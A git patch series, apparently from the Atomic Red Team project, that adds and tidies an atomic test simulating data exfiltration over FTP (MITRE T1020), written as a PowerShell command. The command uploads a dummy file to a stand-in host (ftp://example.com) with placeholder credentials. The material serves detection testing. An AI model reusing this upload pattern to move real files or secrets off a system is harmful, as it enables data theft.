From 70663f60c25a1b3c4b05f1f705283efa5d1a8ee8 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti
 <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:13:16 +0530
Subject: [PATCH 1/4] Update T1020.yaml

Atomic Test #2 - Exfiltration via Encrypted FTP
Simulates encrypted file transfer to an FTP server, representing stealthy data exfiltration methods.
---
 atomics/T1020/T1020.yaml | 35 +++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 8b6959ae66..526561cfd4 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -29,3 +29,38 @@ atomic_tests:
       $fileName = "#{file}"
       Remove-Item -Path $fileName -ErrorAction Ignore
     name: powershell
+
+- name: Exfiltration via Encrypted FTP
+  auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
+  description: Simulates encrypted file transfer to an FTP server.
+  supported_platforms:
+    - windows
+  input_arguments:
+    sampleFile:
+      description: Path of the sample file to exfiltrate.
+      type: String
+      default: C:\temp\T1020__FTP_sample.txt
+    ftpServer:
+      description: FTP server URL.
+      type: Url
+      default: ftp://example.com
+    credentials:
+      description: FTP server credentials.
+      type: String
+      default: [user:password]
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $sampleData = "Sample data for exfiltration test"
+      Set-Content -Path "#{sampleFile}" -Value $sampleData
+      $ftpUrl = "#{ftpServer}"
+      $creds = Get-Credential -Credential "#{credentials}"
+      Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
+  cleanup_command: |
+    Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
+  dependencies: []
+  prereq_command: ""
+  get_prereq_command: ""
+  notes:
+    - For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.

From fa2da1484acbd4697cd61a1a3b24b79b769fcac4 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti
 <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:18:23 +0530
Subject: [PATCH 2/4] Update T1020.yaml

updated notes
---
 atomics/T1020/T1020.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 526561cfd4..4f64c575ca 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -63,4 +63,5 @@ atomic_tests:
   prereq_command: ""
   get_prereq_command: ""
   notes:
-    - For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
+    - "For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only."
+

From 630ecd72e116944e86b16e664ef793253c48cc14 Mon Sep 17 00:00:00 2001
From: sai prashanth pulisetti
 <40313110+prashanthpulisetti@users.noreply.github.com>
Date: Thu, 18 Jan 2024 13:20:38 +0530
Subject: [PATCH 3/4] Update T1020.yaml

updated line 50
---
 atomics/T1020/T1020.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 4f64c575ca..2bdff77196 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -47,7 +47,7 @@ atomic_tests:
     credentials:
       description: FTP server credentials.
       type: String
-      default: [user:password]
+      default: "[user:password]"
   executor:
     name: powershell
     elevation_required: false

From 8992934c11e2e38546ec4fd209c382845a5376bf Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Thu, 18 Jan 2024 15:51:38 -0600
Subject: [PATCH 4/4] move notes to description, remove empty tags

---
 atomics/T1020/T1020.yaml | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 2bdff77196..82c85fc152 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -32,7 +32,7 @@ atomic_tests:
 
 - name: Exfiltration via Encrypted FTP
   auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
-  description: Simulates encrypted file transfer to an FTP server.
+  description: Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
   supported_platforms:
     - windows
   input_arguments:
@@ -59,9 +59,3 @@ atomic_tests:
       Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
   cleanup_command: |
     Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
-  dependencies: []
-  prereq_command: ""
-  get_prereq_command: ""
-  notes:
-    - "For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only."
-